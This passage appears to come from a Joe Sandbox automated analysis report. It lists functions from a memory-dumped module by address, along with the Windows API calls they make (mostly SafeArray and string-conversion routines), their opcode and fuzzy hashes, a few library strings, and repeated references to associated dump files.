Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: beb1b832390daca510f564c7702161bf5d32a2faa334fd253490b249b6130cc8
Instruction ID: 245235e1f80b95045e20a10b3d0fa862ff4332b095d8d7cc723e5fad3f377d23
Opcode Fuzzy Hash: beb1b832390daca510f564c7702161bf5d32a2faa334fd253490b249b6130cc8
Instruction Fuzzy Hash: EF314BB0E016189FCB10CBA9CE84BADB7B9AF99308F30859AE558E7741C771D9818F50

Function 6CEB00B4 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 5c0895e87ffee52fdf3361bbcee23bb64d21883d658c8f63abc8e28a1688bf3d
Instruction ID: 301851f59096b9d46c8bc7c2335cc15f0638b5dd0c5d7a5a39e84764b19546da
Opcode Fuzzy Hash: 5c0895e87ffee52fdf3361bbcee23bb64d21883d658c8f63abc8e28a1688bf3d
Instruction Fuzzy Hash: FA314BB0A016189FCB10CBA9CD84BADF7B9AF95308F30859AE458E7741C775DD818F50

Function 6CEB01BE Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 04a71124eec1266f15032bede2c8fb1ce971f07ab39ab5b12e898db1874695ab
Instruction ID: 2f2ab757f9c1ec67bbd0b46e306f859c86b94314166ffa01c2f4a1f43c8df9fe
Opcode Fuzzy Hash: 04a71124eec1266f15032bede2c8fb1ce971f07ab39ab5b12e898db1874695ab
Instruction Fuzzy Hash: 71316BB0E016189FDB10CBA9CD84BADB7BAAF95208F30859AE458E7741C771ED818F50

Function 6CEB02C2 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 1dbc0cb078bd0959133217d36a2e6ff6032a9aafaf621a5f94095e7272368a57
Instruction ID: 64650032269d5e2074c6de2ff6248ab0319a8547b6661ce650e05a417f59df6d
Opcode Fuzzy Hash: 1dbc0cb078bd0959133217d36a2e6ff6032a9aafaf621a5f94095e7272368a57
Instruction Fuzzy Hash: 72314BB0A016189FCB10CFA9CD84BADB7B9AF99304F30869AE458E7745C771E9858F50

Function 6CEB03DE Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 79a8481db9707c0c7793648626287ed366d25ed449e8f48e297b30a067fac0fe
Instruction ID: c453192eca7b5b4fee404bf899f929ae85d4ad7f2dc19bf8cd40a15ded1a1f95
Opcode Fuzzy Hash: 79a8481db9707c0c7793648626287ed366d25ed449e8f48e297b30a067fac0fe
Instruction Fuzzy Hash: D6314DB0E016189FCB10CFA9CD84BADB7B9AF95204F30869AE458E7745C771E9818F50

Function 6CEAFD9F Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: aa992451a3ca5555bb50b5c95d5feff7e80f287c7bbc7799332b9c55c694ca0a
Instruction ID: 515d3d362c7128beedc860827c5022d1e8bc583ad7317f21f17de0edb69941c7
Opcode Fuzzy Hash: aa992451a3ca5555bb50b5c95d5feff7e80f287c7bbc7799332b9c55c694ca0a
Instruction Fuzzy Hash: 92314BB0E016189FCB10CFA9CD84BADF7B9AF99208F30859AE458EB741C775E9418F50

Function 6CEB9011 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: beb1b832390daca510f564c7702161bf5d32a2faa334fd253490b249b6130cc8
Instruction ID: 66608838512867efaaa93b1846476dda60df44d227015f26623438c86368b8d3
Opcode Fuzzy Hash: beb1b832390daca510f564c7702161bf5d32a2faa334fd253490b249b6130cc8
Instruction Fuzzy Hash: 30315C70E016189FCB10CFA8CD80BAEB7B9AF85208F30858AE419E7741C771D981CF50

Function 6CF0249C Relevance: 9.1, APIs: 6, Instructions: 92COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000100,?,?,?,?,?,6CF025B1,?,00000000,?), ref: 6CF024E6
_malloc.LIBCMT ref: 6CF0251B
_memset.LIBCMT ref: 6CF0253B
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,00000001,?,00000000,00000001,00000000), ref: 6CF02550
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6CF0255E
__freea.LIBCMT ref: 6CF02568

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ByteCharMultiWide$StringType__freea_malloc_memset
String ID:
API String ID: 525495869-0
Opcode ID: d032ead4f75aab4780f36bfa91b69502e6d85036f69180bb380ed93caf66dc0e
Instruction ID: 0d850866776ee0e87a4ca283e9fd2e82b186f72d4ba1462881ccca0cee26668d
Opcode Fuzzy Hash: d032ead4f75aab4780f36bfa91b69502e6d85036f69180bb380ed93caf66dc0e
Instruction Fuzzy Hash: 8031BFB170020AAFEF008F65DCA4DAF7BB9EB08758F210029F914D7650E732DD149B60

Function 6CEB8A39 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 6CEB69C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CEB6A08
Part of subcall function 6CEB69C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB6A15
Part of subcall function 6CEB69C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEB6A41

SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$Destroy$Bound$Element
String ID:
API String ID: 757764206-0
Opcode ID: 43f87826ed93d798f1b43a4f0cf21625e845d542232a455242a23ab19cedc63b
Instruction ID: 23f9354900c866581d3f88e01655e12774461ffba885a714339a6874d4299ebd
Opcode Fuzzy Hash: 43f87826ed93d798f1b43a4f0cf21625e845d542232a455242a23ab19cedc63b
Instruction Fuzzy Hash: 5F312971E416189FCB10CBA8CD80BAEB7BAAF85208F34468AE419E7741C775A9808F50

Function 6CEB87EE Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 6CEB69C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CEB6A08
Part of subcall function 6CEB69C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB6A15
Part of subcall function 6CEB69C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEB6A41

SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$Destroy$Bound$Element
String ID:
API String ID: 757764206-0
Opcode ID: 4b8dad4e1868d3d53beaf95cf77cdf158aadfc09e31c46aefee08b69d271e768
Instruction ID: 200b333f84ce45a6fd26da78aa40d85e2b46f715335f1e97dff3e1100952ce85
Opcode Fuzzy Hash: 4b8dad4e1868d3d53beaf95cf77cdf158aadfc09e31c46aefee08b69d271e768
Instruction Fuzzy Hash: 4A314970E416189FCB10CBA8CD80BAEB7BAAF95208F70468AE459F7741C775E9808F50

Function 6CEAFD3E Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 6CEB69C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CEB6A08
Part of subcall function 6CEB69C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB6A15
Part of subcall function 6CEB69C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEB6A41

SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$Destroy$Bound$Element
String ID:
API String ID: 757764206-0
Opcode ID: 4b8dad4e1868d3d53beaf95cf77cdf158aadfc09e31c46aefee08b69d271e768
Instruction ID: 55fdc04cbe9658084808cc0eed7bc5c70cb166f5a1f13df79b21c57bbfa8f30e
Opcode Fuzzy Hash: 4b8dad4e1868d3d53beaf95cf77cdf158aadfc09e31c46aefee08b69d271e768
Instruction Fuzzy Hash: 2D3149B0E016189FCB10CBA9CD84BADB7BAAF95308F30858AE458E7741C7759D858F50

Function 6CEAFF89 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 6CEB69C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CEB6A08
Part of subcall function 6CEB69C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB6A15
Part of subcall function 6CEB69C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEB6A41

SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$Destroy$Bound$Element
String ID:
API String ID: 757764206-0
Opcode ID: 43f87826ed93d798f1b43a4f0cf21625e845d542232a455242a23ab19cedc63b
Instruction ID: 7058394d21ab261365077db69bb0a06265cd5ff6b58f8bd75f478bfb744bfe32
Opcode Fuzzy Hash: 43f87826ed93d798f1b43a4f0cf21625e845d542232a455242a23ab19cedc63b
Instruction Fuzzy Hash: 9B314CB0E016189FCB14CBA9CD84BADF7BAAF99308F30468AE458E7741C7759D818F50

Function 6CEF06A0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 328COMMON

Download Yara Rule

APIs

Part of subcall function 6CE94760: __CxxThrowException@8.LIBCMT ref: 6CE947F9

_memmove.LIBCMT ref: 6CEF0907
_memmove.LIBCMT ref: 6CEF0936
_memmove.LIBCMT ref: 6CEF0959
__CxxThrowException@8.LIBCMT ref: 6CEF0A25

Strings

PSSR_MEM: message recovery disabled, xrefs: 6CEF09E3

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: _memmove$Exception@8Throw
String ID: PSSR_MEM: message recovery disabled
API String ID: 2655171816-3051149714
Opcode ID: b6e36fb4b76eac5723700df7b1b9f54c59501c6cf3cf601ef544b1ac3567205b
Instruction ID: 87122e141820429028009b16de9ce3ccf499fa29878f6f3e74065229f81af938
Opcode Fuzzy Hash: b6e36fb4b76eac5723700df7b1b9f54c59501c6cf3cf601ef544b1ac3567205b
Instruction Fuzzy Hash: DBC15B756083819FD714CF28C980B6AB7F5AFC9308F248A5DE59987385DB34E906CB92

Function 6CEF7FE0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 325COMMON

Download Yara Rule

APIs

Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A

__CxxThrowException@8.LIBCMT ref: 6CEF80EA

Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7

Strings

Max, xrefs: 6CEF83E3
Min, xrefs: 6CEF83C5
RandomNumberType, xrefs: 6CEF83A9
invalid bit length, xrefs: 6CEF8044

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
